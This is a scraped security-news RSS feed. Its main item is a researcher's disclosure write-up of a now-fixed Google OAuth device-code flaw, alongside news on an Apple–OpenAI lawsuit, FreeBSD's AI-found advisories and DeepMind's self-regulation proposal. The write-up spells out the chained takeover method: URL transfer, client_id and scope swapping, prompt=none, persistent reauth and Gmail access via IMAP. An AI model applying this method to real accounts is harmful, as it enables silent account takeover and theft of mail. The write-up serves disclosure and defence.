<p class="wp-block-paragraph">In making its move, Apple shows this is not a dispute about just one or two hires, but an attempt to constrain the movement of intellectual property between the two firms. With AI hardware emerging as the next major battleground in tech, the case could become a defining one; whatever resolution is eventually reached could define the extent to which former employees can carry experience and knowledge between competing firms. The case might also define what the line is between experience and knowledge and the sharing of trade secrets.</p>



<p class="wp-block-paragraph">This is important, because modern hardware development relies on <a href="https://www.applemust.com/openai-discovers-it-takes-time-not-just-design-to-build-great-hardware/#google_vignette" target="_blank" rel="noreferrer noopener">far more than just finished designs</a>. Product design leans into supplier relationships, manufacturing assumptions, physics, extensive prototyping, and product-roadmap priorities. If courts treat those accumulated insights as protectable secrets, hiring between major technology companies could become far more legally sensitive.</p>



<h2 class="wp-block-heading"><strong>The Jony Ive question</strong></h2>



<p class="wp-block-paragraph">The case comes as Apple prepares to <a href="https://www.computerworld.com/article/3992592/jony-ive-and-openai-plan-bicycles-for-21st-century-minds.html">combat OpenAI in hardware</a>. Its competitor is <a href="https://openai.com/sam-and-jony/" target="_blank" rel="noreferrer noopener">now working with legendary former Apple designer Jony Ive</a>. Ive is not named in the litigation, but Apple will be keen to find out whether confidential product knowledge, design processes, or supply-chain insights have travelled with former staff into OpenAI’s device work.</p>



<p class="wp-block-paragraph">Ultimately, for Apple, it’s about protecting its many blueprints for whatever hardware the company expects will come after the iPhone.</p>



<p class="wp-block-paragraph">For its part, OpenAI has refuted Apple’s lawsuit, arguing that it is “not aware of any evidence” that the lawsuit has merit. “We have no interest in other companies’ trade secrets,” <a href="https://x.com/drewpusateri/status/2075708238650089981" target="_blank" rel="noreferrer noopener">said OpenAI spokesperson Drew Pusateri</a>. “We remain focused on building innovative technology that empowers people everywhere.” The company’s lawyers also <a href="https://appleinsider.com/articles/26/07/15/openai-blames-email-mixup-for-why-it-didnt-respond-to-apple-trade-theft-claims">claim it did respond to Apple’s initial inquiries</a> on the matter.</p>



<h2 class="wp-block-heading"><strong>What’s at stake</strong></h2>



<p class="wp-block-paragraph">The significance of Apple’s newly-shared communication preservation orders is that if discovery uncovers evidence supporting Apple’s claims, the case could complicate OpenAI’s hardware plans and create unwelcome scrutiny ahead of any future public offering.</p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Confused Deputy: Google IdP Universal Account Takeover via Device Code Flow Hijacking]]></title>
<description><![CDATA[TL;DRThis one started from setting up the YouTube app on my PS5. The device authorization grant (RFC 8628) it uses, the flow TVs, consoles, and CLIs rely on when they don’t have a browser of their own, turned out to hide two stacked bugs in Google’s implementation.Two bugs stack together. First, ...]]></description>
<link>https://tsecurity.de/de/3675347/hacking/confused-deputy-google-idp-universal-account-takeover-via-device-code-flow-hijacking/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675347/hacking/confused-deputy-google-idp-universal-account-takeover-via-device-code-flow-hijacking/</guid>
<pubDate>Fri, 17 Jul 2026 09:23:37 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>TL;DR</h3><p>This one started from setting up the YouTube app on my PS5. The device authorization grant (RFC 8628) it uses, the flow TVs, consoles, and CLIs rely on when they don’t have a browser of their own, turned out to hide two stacked bugs in Google’s implementation.</p><p>Two bugs stack together. First, the session that anchors a device-code sign-in is fully transferable: copy the sign-in URL from one browser to another and the second browser’s login satisfies the first device’s poll. Second, the authorization server never binds client_id and scope to the device_code server-side, so both can be swapped in the URL after the fact. Chain the two together with the prompt=none parameter and any link, opened by a victim who has ever used "Sign in with Google" anywhere, silently hands over an access token for an arbitrary Google-registered client, no click, no consent screen, no 2FA prompt, almost no trace in the victim's account activity.</p><p>Reported to Google’s VRP on Feb 25, 2026, initially closed twice as “won’t fix”: social engineering, reopened after a one-click PoC, fixed by Mar 28, 2026, and rewarded $13,337. Details on that back-and-forth are in the <a href="https://weirdmachine64.github.io/research/google-oauth-device-code-hijacking.html#9-disclosure-timeline">disclosure timeline</a> below.</p><h3>1. Intro</h3><p>Most of the well-known attacks on OAuth go after the client or the resource server: a malicious app, an open redirect, a signing-algorithm mix-up. They leave the authorization server itself alone, because it’s the one party in the protocol that’s supposed to be unshakeable, the thing every other trust decision is anchored to. This is a story about going after that assumption directly, in the one corner of OAuth that’s explicitly designed to let the login happen on a completely different screen: the device authorization grant.</p><p>It started as a mundane afternoon setting up a TV app on a game console, and it ended with a way to silently take over accounts on virtually any site that offers “Sign in with Google.” Getting from one to the other took two separate findings stacked on top of each other, a rejected report, and a fix to the fix. What follows is that story, roughly in the order it actually happened, blockers included.</p><h3>2. The Device Authorization Grant</h3><p>Most OAuth flows assume the device asking for access has a browser sitting right there to redirect through. RFC 8628 exists for the case where it doesn’t: a smart TV, a games console, a headless CLI. The shape is different from the usual redirect dance:</p><ol><li>The device calls the authorization server directly (POST /device/code) and gets back a device_code (secret, stays on the device) and a user_code (short, shown on screen).</li><li>The device displays the user_code and tells the user to go to a URL, google.com/device in Google's case, on <em>any other</em> browser.</li><li>The user opens that URL on their phone or laptop, types the code, signs in, and consents.</li><li>Meanwhile the device has been polling POST /token with its device_code. Once the user finishes step 3, the next poll returns an access token.</li></ol><p>The whole point of the design is that the device and the browser doing the authenticating can be, and usually are, two completely different pieces of hardware. That’s also exactly what makes this flow interesting to attack: the protocol <em>already</em> expects the login to happen somewhere else. The only thing holding the model together is that the “somewhere else” has to be a browser <em>the legitimate device owner</em> is sitting at.</p><p>That’s the assumption. The rest of this write-up is what happened when I went looking for the place where Google’s implementation stops enforcing it.</p><h3>3. Setting Up YouTube TV on a PS5</h3><p>I was setting up the YouTube app on my PS5, ordinary first-run setup. The console has no keyboard and no way to type a password comfortably with a controller, so it does the sensible thing: it shows a short user_code on screen and tells you to go sign in on your phone instead. I typed the code into google.com/device, signed into Google, approved the consent screen, and a few seconds later the PS5 was logged in.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*qmQssZXzIn_0kJeh.png"><figcaption><em>The YouTube TV “Add your Google Account” screen: a QR code and a short user_code, with instructions to finish sign-in on a phone.</em></figcaption></figure><p>Nothing about that felt unusual as a user, but the flow itself was intriguing: a screen with no keyboard asking me to authenticate on a completely separate device, and coming back logged in seconds later. That disconnect between where I typed my password and where the session actually landed is what made me want to look at it more closely. Behind the scenes, that’s:</p><ul><li>POST https://oauth2.googleapis.com/device/code → device_code + user_code.</li><li>The PS5 polling POST https://oauth2.googleapis.com/token with that device_code.</li><li>My phone’s browser walking through https://accounts.google.com/o/oauth2/v2/auth?… to finalize consent once I typed the code and signed in.</li><li>The PS5’s next poll returning an access token.</li></ul><p>Standard, boring, RFC-compliant. The interesting part is what that accounts.google.com/o/oauth2/v2/auth URL is actually carrying, and what happens if you don't treat it as disposable. That question is exactly what kicked off everything that follows.</p><h3>4. The Transferable Session</h3><p>The obvious question with any flow where “the state lives in a URL” is: what happens if you just move the URL? If the entire sign-in step for a device_code can be handed to someone else, then whoever finishes that sign-in step ends up logged into <em>my</em> device, not theirs.</p><p>RFC 8628 §5.4 anticipates exactly this and tells implementers not to let it happen: the whole security model of the flow depends on the user completing verification on a device they’re <em>not</em> about to lose control of.</p><p>I started a fresh device flow on the PS5, walked through google.com/device on a laptop, and at the consent screen copied the resulting URL into a second browser. That failed outright: no session for the second browser to pick up.</p><p>But the device-code page asks for an email address <em>before</em> showing consent. Entering one forwards the browser to a different endpoint entirely: a <em>challenge</em> page at accounts.google.com/v3/signin/challenge/…, carrying a new parameter, TL=APouJz6T…. Sending <em>that</em> URL to a second browser worked. The second browser prompted a completely normal Google sign-in. Seconds after logging in, that account showed up on the PS5.</p><p>TL is an encrypted blob carrying the session state, practically certain to be the device_code, or something that resolves to it, given that it's the only thing left in the URL that could anchor the poll back to a specific device.</p><p><strong>Vulnerability #1: the device-code sign-in session is transferable via URL.</strong> RFC 8628 explicitly says it shouldn’t be. Send the link, get the account.</p><p>That’s a real account takeover, but a narrow one. YouTube TV’s scopes are capped by design, and that cap is the wall I hit next.</p><h3>5. Breaking the Scope Fence</h3><p>A YouTube TV account takeover is real, but Google fences the device flow to a short, deliberately low-risk scope allowlist. Per <a href="https://developers.google.com/identity/protocols/oauth2/limited-input-device">Google’s own docs</a>: <em>“This OAuth 2.0 flow supports a limited set of scopes.”</em> The complete list:</p><ul><li>openid, email, profile</li><li>youtube, youtube.readonly</li><li>drive.appdata, drive.file (app-scoped Drive only, not full Drive)</li></ul><p>No Gmail, no full Drive, no cloud-platform, no compute. The access token I got only worked against a YouTube TV–internal API: enough to like a video or subscribe to a channel. Not exactly a headline bug.</p><p>So I looked again at the transferable challenge URL:</p><pre>accounts.google.com/v3/signin/challenge/…<br>  ?TL=APouJz6T…              &lt;- encrypted session state<br>  &amp;response_type=none<br>  &amp;client_id=861556708454-…   &lt;- YouTube TV<br>  &amp;scope=…                    &lt;- YouTube scopes</pre><p>Two things stand out. response_type=none means this isn't a normal code/token redirect: there's nothing coming back to a callback at all. And there is <strong>no </strong><strong>redirect_uri anywhere in the URL</strong>. The entire boundary that OAuth normally relies on to pin where a grant goes is simply absent from this endpoint, because the grant never gets delivered through the browser; it gets delivered out-of-band, over the device's /token poll.</p><p>The only thing anchoring the session is TL. client_id and scope are just along for the ride in the query string. So: keep TL, swap client_id for a different application, and see which client the authorization server ends up authenticating.</p><p>I scripted the device-code issuance, took the resulting URL, and changed client_id from YouTube TV to Google's own <strong>Cloud SDK</strong> client, with scope changed to cloud-platform, compute, appengine.admin. The consent screen that came back said <strong>Google Cloud SDK</strong>, listing the elevated scopes. Approving it, my polling script, still polling with the <em>original</em> YouTube TV device_code, got back a token on its next call. Inspecting it: cloud-platform, compute, appengine.admin. Not YouTube.</p><p><strong>Vulnerability #2: the server never validates that the </strong><strong>client_id and </strong><strong>scope in the authorization URL match what the </strong><strong>device_code was actually issued for.</strong></p><p>Combined with vulnerability #1, the authorization server ends up issuing tokens under one client’s identity (Google Cloud SDK, or any other Google-registered client, first- or third-party) for a session that started under a completely different one (YouTube TV). redirect_uri isn't just weakly validated here: it's not present at all, because the grant never travels through a redirect in this flow to begin with.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/1*4UwF2sE4BZuwRTMM9aJo9w.gif"><figcaption><em>PoC: device-code hijack escalated from YouTube TV to Google Cloud SDK scopes</em></figcaption></figure><p>The escalation chain worked end to end, at least on paper. Only one step was left: telling Google about it, and finding out whether they’d agree it was a bug at all.</p><h3>6. From Consent Screen to One Click</h3><p>I filed this as a report. It came back rejected the next day, citing user interaction: the victim “consented.” Fair, in a narrow sense: the consent screen is genuinely rendered by Google, the click is a genuine click. But the <em>thing being consented to</em> was shaped entirely by parameter substitution in a link I built, and from the victim’s side there is nothing to notice that’s different from any other Google sign-in. Still, “user interaction” was the stated bar, so the next step was removing it.</p><p>OAuth has a prompt parameter for exactly the case of skipping the consent screen: set to none, it tells the authorization server not to show any UI if the user has already granted the requested scopes to that client before. It's meant to be narrow, restricted to low-risk scopes like openid, email, profile, and gated on prior consent.</p><p>In practice it isn’t narrow at all. “Sign in with Google” is everywhere, and most people have already granted openid email profile to dozens, sometimes hundreds, of apps over the years without ever thinking about it again.</p><p>Take the weaponized device-code URL, drop in Facebook’s client_id (any site using "Sign in with Google" works the same way), set scope=openid email profile, add prompt=none. The victim opens the link, and that's the only action required: no consent screen, no button to press. The browser silently completes the flow in the background, the polling script receives an id_token for that third-party application, and that token replays cleanly against the app's own "Sign in with Google" endpoint.</p><p><strong>One link. Opening it is the only interaction required. Account takeover on virtually any application that uses Sign in with Google.</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/1*hHiWXmNkC5aWkKKDsmLD9w.gif"><figcaption><em>PoC: prompt=none one-click bypass against a third-party client</em></figcaption></figure><p>The technical bypass was solid. What I didn’t know yet was whether any of it would actually be visible, to the victim or to Google’s own monitoring, if it were used for real.</p><h3>7. Why the Victim Never Notices</h3><p>The natural follow-up: surely <em>something</em> surfaces to the victim: a login alert, a new entry under connected apps, a 2FA prompt? It doesn’t, and that’s not incidental. Every signal that would normally catch this gets routed around by the shape of the device-code flow itself.</p><p><strong>Audit trail pollution.</strong> myaccount.google.com/connections shows the <em>original</em> client bound to the device_code, YouTube TV, never the substituted application. To find any trace of the attack, a victim would have to open the connections page, scroll to find "YouTube TV" among however many connected apps they have, click into it, click "see details" to expand the granted scopes, and then recognize that YouTube TV requesting cloud-platform / compute / appengine.admin is not normal. Five deliberate steps and a piece of domain knowledge very few people have.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*Nq78jsm8FNLJ6QFG.png"><figcaption><em>The “YouTube on TV” connections entry, expanded: Gmail read/compose/send/delete, Cloud SQL, App Engine, and Compute Engine, all under a client that’s supposed to only need YouTube scopes</em></figcaption></figure><p><strong>Implicit 2FA bypass.</strong> The victim goes through a completely ordinary Google sign-in, which already satisfies any 2FA they have configured. The token handoff to the attacker happens afterward, over the device poll, with no further prompt of any kind. The actual high-risk action, an OAuth grant under an arbitrary client’s identity, never trips a high-risk challenge, because as far as the authentication layer is concerned, nothing risky happened; a user just logged in normally.</p><p>Stealth, solved. The remaining question was reach: how far the same substitution trick could be pushed past YouTube TV’s own scopes.</p><h3>8. Extending the Primitive</h3><p>Stealth is one axis; reach is the other. The same client_id/scope substitution keeps paying out against different corners of the Google ecosystem.</p><p><strong>Persistent access via </strong><strong>accounts.reauth.</strong> Add that scope to the substitution and the resulting grant can refresh indefinitely, with no further victim interaction required: a shoot-and-forget backdoor rather than a one-time token.</p><p><strong>A Gmail backdoor via IMAP, not the REST API.</strong> Substituting a client_id that's allowed to request https://mail.google.com (Apple's iOS Mail client, for instance) gets a token scoped to full Gmail access. Hitting the Gmail REST API with it fails: <em>"Gmail API has not been used in project 861556708454 before or it is disabled."</em> That project ID belongs to YouTube TV, and the original device-code client never had the Gmail API enabled. That's a project-level gate, not a token-level one, so it's worth checking whether there's another door into the same mailbox. Gmail's IMAP server supports OAuth via the <strong>XOAUTH2</strong> SASL mechanism, using the exact same https://mail.google.com/ scope but going through imap.gmail.com:993 instead of the REST API's project-gated surface. It accepts the token without issue. Full inbox access, with the same token the REST API had just rejected.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*k7pQv3pDxP21l5DQ.png"><figcaption><em>Successful IMAP XOAUTH2 authentication over the substituted token, listing real Gmail folders and recent inbox messages</em></figcaption></figure><p>End to end: a transferable session, plus unvalidated client_id/scope binding, plus prompt=none, equals a link that's invisible to the person who opens it and ends in a fully compromised account, Gmail included.</p><p>Chain complete: transferable session, unbound client_id/scope, prompt=none, silent to the victim, and a Gmail backdoor at the end of it. Time to see what Google's VRP panel made of all that.</p><h3>9. Disclosure Timeline</h3><p><strong>Feb 25, 2026</strong> Report filed with Google VRP<br><strong>Mar 2, 2026</strong> Closed: Won’t Fix (Intended Behavior), citing “social engineering”<br><strong>Mar 2, 2026</strong> Pushed back same day<br><strong>Mar 3, 2026</strong> Reopened, then closed again: Won’t Fix (Infeasible)<br><strong>Mar 3, 2026</strong> Countered with a prompt=none one-click PoC against Facebook’s client_id<br><strong>Mar 4, 2026</strong> Reopened a second time and accepted; bug filed with the product team<br><strong>Mar 28, 2026</strong> Marked fixed<br><strong>Apr 2, 2026</strong> Rewarded $13,337</p><p>The two rejections both leaned on the same argument: that tricking a user into approving an OAuth prompt is a social-engineering problem, not a vulnerability in Google’s implementation. That didn’t hold up on either pass. The first rejection ignored that this is the exact sign-in flow every Google user already knows, on accounts.google.com, arriving at an app that has no business holding cloud-platform or appengine.admin scopes doing exactly that. The second treated it as equivalent to installing a malicious OAuth app, which the prompt=none PoC against Facebook's client_id directly disproved: there was no prompt to approve, and no app to install; the victim only had to open a link.</p><h3>10. Mitigations</h3><p>For a flow that’s explicitly designed to hand sign-in off to a second device, the fix has to happen server-side, since there’s nothing meaningful a client application can check on its own:</p><ol><li>Keep user_code, device_code, and any session reference that resolves to them out of URLs entirely. If a session can't be copied into a different browser, it can't be handed to a victim.</li><li>Bind client_id and scope to the device_code at issuance time, server-side. At the consent step, look those values up from that binding instead of trusting whatever the URL says; reject any mismatch.</li><li>On the consent screen, show device information (name, model) and require the user to actively confirm that device is the one in front of them.</li></ol><h3>11. Conclusion</h3><p>The device authorization grant is a narrow, deliberately low-trust flow, right up until the authorization server treats “who is asking” and “what are they asking for” as details that only need to be true at the <em>start</em> of the flow, not checked again by the time consent is granted. Once the session itself turned out to be transferable across browsers, the missing binding between device_code and client_id/scope stopped being a narrow YouTube TV bug and became a way to mint tokens for any Google-registered client, first-party or third-party, capped only by which scopes that client happens to be allowed to request.</p><p>Thanks for reading.</p><p>Originally published on <a href="https://weirdmachine64.github.io/research/google-oauth-device-code-hijacking.html">https://weirdmachine64.github.io/research/google-oauth-device-code-hijacking.html</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=dc6ec2db35a9" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/confused-deputy-google-idp-universal-account-takeover-via-device-code-flow-hijacking-dc6ec2db35a9">Confused Deputy: Google IdP Universal Account Takeover via Device Code Flow Hijacking</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[6 Best Linux Monitoring Software & Tools for 2026]]></title>
<description><![CDATA[When Linus Torvalds released the first version of his Linux Kernel way back in 1991, nobody thought it would ever grow to what it has become. Today, Linux is everywhere and although it hasn’t made it very far as a mainstream desktop operating system, it is now commonplace on servers. Just like se...]]></description>
<link>https://tsecurity.de/de/3674917/betriebssysteme/6-best-linux-monitoring-software-tools-for-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674917/betriebssysteme/6-best-linux-monitoring-software-tools-for-2026/</guid>
<pubDate>Fri, 17 Jul 2026 04:10:06 +0200</pubDate>
<category>🖥️  Betriebssysteme</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>When Linus Torvalds released the first version of his Linux Kernel way back in 1991, nobody thought it would ever grow to what it has become. Today, Linux is everywhere and although it hasn’t made it very far as a mainstream desktop operating system, it is now commonplace on servers. Just like servers running any […]</p>
<p>The post <a rel="nofollow" href="https://www.addictivetips.com/net-admin/best-linux-monitoring-tools/">6 Best Linux Monitoring Software &amp; Tools for 2026</a> appeared first on <a rel="nofollow" href="https://www.addictivetips.com/">AddictiveTips</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FreeBSD Released the Most Security Advisories in Project History in June 2026]]></title>
<description><![CDATA[On average, the FreeBSD security team releases about 2 security advisories per month. AI has changed this.  In April, the project released 8 advisories, with 6 powered by AI.  In May, the count decreased slightly to 7.  Today I took a look at the FreeBSD Security Advisory page to check the latest...]]></description>
<link>https://tsecurity.de/de/3674900/it-security-nachrichten/freebsd-released-the-most-security-advisories-in-project-history-in-june-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674900/it-security-nachrichten/freebsd-released-the-most-security-advisories-in-project-history-in-june-2026/</guid>
<pubDate>Fri, 17 Jul 2026 03:52:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>On average, the FreeBSD security team releases about 2 security advisories per month. AI has changed this. </div><div> </div><div>In April, the project released 8 advisories, <a href="https://www.reddit.com/r/freebsd/comments/1t0ei6o/ai_found_6_out_of_8_freebsd_security_advisories/">with 6 powered by AI</a>.  In May, the count decreased slightly to 7. </div><div> </div><div>Today I took a look at the <a href="https://www.freebsd.org/security/advisories/">FreeBSD Security Advisory</a> page to check the latest advisory count.</div><div> </div><div>June saw the most number of advisories ever published in project history: 25.</div><div> </div><div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXCtOGgN23DN0aQXhw-6X5iKxsGy1VTmfao5_Y-s0XjtXS0WQJuy-7CzL1HXqGO6hBkUtJJm78h8EqJNsRnH_ZMk56viiKx9RpMw6T0T1v-ak82oV25lXZr16On78oDaAHkt0G_pEJ1C8pyVUFOaVW7AO_OH3zR73i6zxzVSCHOdegJgGNxrqx/s1600/FreeBSD%20Security%20Vulns%20by%20month.png"><img border="0" data-original-height="686" data-original-width="1600" height="274" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXCtOGgN23DN0aQXhw-6X5iKxsGy1VTmfao5_Y-s0XjtXS0WQJuy-7CzL1HXqGO6hBkUtJJm78h8EqJNsRnH_ZMk56viiKx9RpMw6T0T1v-ak82oV25lXZr16On78oDaAHkt0G_pEJ1C8pyVUFOaVW7AO_OH3zR73i6zxzVSCHOdegJgGNxrqx/w640-h274/FreeBSD%20Security%20Vulns%20by%20month.png" width="640"></a></div>This blows away the previous record of 18 from January 2001. The other big spike was 11 in January 2016.</div><div> </div><div></div><div>AI apaprently discovered at least 9 of the June 2026 FreeBSD vulnerabilities.</div><div> </div><div>On 15 June the FreeBSD Foundation announced the <a href="https://freebsdfoundation.org/blog/freebsd-ai-assisted-vulnerability-discovery-project-launch/">FreeBSD AI-assisted Vulnerability Discovery Project</a>:</div><div> </div><div>"The 6-month project is being funded by a grant from the Alpha Omega project. </div><div> </div><div>The funds will be used to engage FreeBSD Security Team members under fixed-term contracts to find and patch vulnerabilities. </div><div> </div><div>The Security Team’s access to publicly available AI models and tokens will be provided free of charge. AI will be used for vulnerability discovery and analysis only, all patches will be manually created." </div><div> </div><div>Yes, 25 vulnerabilities is far lower than the 570 associated with Patch Tuesday this week. However, it's important to see the effects of AI-powered vulnerability discovery everywhere. It's not hype. It is real. </div><div> </div><div>I am hopeful that developers will continue to use AI to discover and fix vulnerabilities in old code, and also prevent new code from shipping with vulnerabilities. </div><div> </div><div>Addendum:</div><div> </div><div><div>I asked Gemini to explain the large number of advisories in 2001-2002. It said:</div><div> </div><div>"The
 pronounced security advisory spike between August 2000 and January 2001
 represents one of the most concentrated periods of security patching in
 FreeBSD's history, totaling 66 advisories in a six-month window.<br><br>A
 closer look at the specific advisories reveals that this spike was 
primarily driven by a massive wave of vulnerabilities discovered in 
popular third-party software (the "Ports" collection) along with 
critical auditing of core networking daemons.<br><br>1. Vulnerabilities in Popular Third-Party Software (Ports)<br><br>During
 this era, many open-source projects were grappling with newly pervasive
 exploitation techniques like buffer overflows and format string 
vulnerabilities. The dataset shows a massive batch of updates for staple
 utilities of the early-2000s internet:<br> </div><div>Internet
 &amp; Chat Clients: Multiple advisories were issued for communication 
tools, including the `pine` mail client, `xchat`, `gaim` (instant 
messaging), `bitchx` (IRC client), and the `netscape` web browser.</div><div> </div><div>Web
 &amp; Content Servers: Security flaws were patched in web servers and 
frameworks like `php`, `zope`, `thttpd`, and the `boa` web server.</div><div><br>Development
 &amp; System Tools: Popular utilities like `curl`, `gnupg`, `cvsweb`, 
`ethereal` (now Wireshark), `syslog-ng`, and even alternative 
shells/editors like `bash1` and `joe` required immediate security 
patches.<br> </div><div>2. Core System &amp; Network Infrastructure Patches<br><br>Alongside
 user-facing applications, the core FreeBSD development team had to 
address architectural and networking vulnerabilities in the base system:<br> </div><div>Routing
 &amp; Firewalls: Critical flaws were patched in basic networking 
security logic, notably `ipfw` (the firewall tool) and `ppp-nat` 
(Network Address Translation).</div><div> </div><div>Core
 Network Daemons: High-risk vulnerabilities struck standard network 
entry points, resulting in patches for `bind` (DNS server), `telnetd`, 
`dhclient`, and the newly adopted `openssh`.</div><div> </div><div>Protocol
 &amp; Kernel Level: Security advisories were issued for low-level 
system components like `tcp-iss` (Initial Sequence Number generation, 
crucial for preventing TCP hijacking) and filesystem-level wrappers like
 `procfs`.<br> </div><div>3. The Climax: January 2001<br><br>The
 spike peaked dramatically in January 2001 alone with 18 advisories. 
This was largely an administrative and security "housecleaning" event. 
Rather than a single massive system failure, it reflects a coordinated 
effort by the FreeBSD Security Officer team to bundle and ship security 
patches for dozens of utilities simultaneously—including `crontab`, 
`inetd`, `mysql`, and `xfree86`—ensuring systems were hardened as the 
platform matured." </div></div><div class="blogger-post-footer">Copyright 2003-2020 Richard Bejtlich and TaoSecurity (taosecurity.blogspot.com and www.taosecurity.com)</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[DeepMind CEO pushes for AI industry self-regulation]]></title>
<description><![CDATA[Google DeepMind CEO Demis Hassabis is pushing for the US AI industry to self-regulate, with the support of government, as a starting point for an international creating shared international standards. In a blog post, he called for a focus on artificial general intelligence (AGI) and national secu...]]></description>
<link>https://tsecurity.de/de/3673460/it-nachrichten/deepmind-ceo-pushes-for-ai-industry-self-regulation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673460/it-nachrichten/deepmind-ceo-pushes-for-ai-industry-self-regulation/</guid>
<pubDate>Thu, 16 Jul 2026 14:33:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Google DeepMind CEO Demis Hassabis is pushing for the US AI industry to self-regulate, with the support of government, as a starting point for an international creating shared international standards. In a blog post, he called for a focus on <a href="https://www.computerworld.com/article/4174181/google-talks-singularity-while-scaling-up-agentic-ai-for-enterprises-2.html">artificial general intelligence (AGI)</a> and national security. </p>



<p class="wp-block-paragraph">But it is precisely that focus on national security that may make the results of such an effort, assuming it happens, less than palatable outside of the US.</p>



<p class="wp-block-paragraph">“The rapid progress we’re seeing in AI requires a new approach to testing frontier AI model capabilities that is dynamic, adaptable, and rigorous,” <a href="https://demishassabis.substack.com/p/a-framework-for-frontier-ai-and-the-dawning-of-a-new-age" target="_blank" rel="noreferrer noopener">Hassabis wrote</a>. “The US is well positioned, given its economic and technical standing, to take the first step in developing such a framework. It could establish a new Standards Body modelled on a federally overseen public-private partnership or self-regulatory organization, much like the Financial Industry Regulatory Authority (FINRA), with a board that includes independent leading technical experts and open-source representatives.”</p>



<p class="wp-block-paragraph">He noted, however, that the funding would need to be substantial, and would most likely come from industry, to allow the new body to attract world-class technical talent and obtain the necessary compute resources for large-scale testing.</p>



<p class="wp-block-paragraph">Hassabis proposed that the organization “be responsible for developing assessment protocols and working with appropriate federal agencies and the US National Labs to conduct testing in areas relevant to national security,” and that AI vendor participants be encouraged to adopt best practices such as publishing model cards with technical details, maintaining strong internal cybersecurity, vetting key personnel, and providing sufficient resourcing for safety and security research.</p>



<p class="wp-block-paragraph">This is not the first time Hassabis has <a href="https://www.computerworld.com/article/4178398/deepmind-ceo-agi-could-be-here-in-three-years.html" target="_blank">expressed worries about AGI</a>. </p>



<p class="wp-block-paragraph">DeepMind was involved in an earlier <a href="https://www.cio.com/article/4168122/us-government-agency-to-safety-test-frontier-ai-models-before-release.html" target="_blank">US government initiative evaluating AI safety</a>, alongside Microsoft and xAI (now SpaceXAI) working with the Center for AI Standards and Innovation (CAISI), a division of the US Department of Commerce. It allowed CAISI to conduct pre-deployment evaluations and targeted research to “better assess frontier AI capabilities and advance the state of AI security.”  </p>



<h2 class="wp-block-heading">The rest of the world may have concerns</h2>



<p class="wp-block-paragraph">Analysts and consultants were mixed about the move, with most expressing concerns about whether an industry-focused group would prioritize the public’s best interests.</p>



<p class="wp-block-paragraph">“Self-regulation is not viable because it implies everyone is able to regulate themselves and will do so in line with the best interests of the public. Most tech vendors don’t have the capacity to self-regulate. They would just prefer a set of rules within which they can operate,” said Gartner VP analyst <a href="https://www.gartner.com/en/experts/nader-henein" target="_blank" rel="noreferrer noopener">Nader Henein</a>. “For-profit organizations are required to do what is best for their shareholders, and external regulation ensures that those organizations are never in a conflict of interest where they have to choose between what is good for their shareholders and what is good for the public.”</p>



<p class="wp-block-paragraph">And, said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, given the international nature of AI models, an effort coordinated by the US government might alienate other countries. </p>



<p class="wp-block-paragraph">“National security is the proposal’s accelerator in Washington and its poison pill abroad: the framing that opens the only gate available at home invites foreign capitals to read the institution as an instrument of American strategy,” he pointed out. </p>



<p class="wp-block-paragraph">“The map is already plural,” he said. “Brussels switches on enforcement powers over general-purpose models [starting in August 2026], London runs the AI Security Institute, and Beijing licenses on its own terms. California and New York have legislated for frontier models at home. The durable route is shared technical evidence with sovereign enforcement, sealed through mutual recognition rather than deference, with India and the other major non-Western markets holding authorship rather than seats.”</p>



<p class="wp-block-paragraph">Gogia added that the rules enacted by even such a group may not address all of the key concerns of enterprise IT. A US government effort along the lines that Hassabis is proposing would result in testing that “sits close to intelligence and industrial policy, and those functions will not stay neatly separated. A model can pass every catastrophic-risk test and still fail the enterprise on privacy, reliability, and liability,” he noted.</p>



<p class="wp-block-paragraph">Walmart’s former director of cybersecurity <a href="https://www.linkedin.com/in/steveneric/" target="_blank" rel="noreferrer noopener">Steven Eric Fisher</a>, who is now an independent cybersecurity consultant, said he found the proposal “well-intentioned, but it addresses a highly polarized topic at a time when commercial interests carry unprecedented political influence, which is not always applied benevolently.”</p>



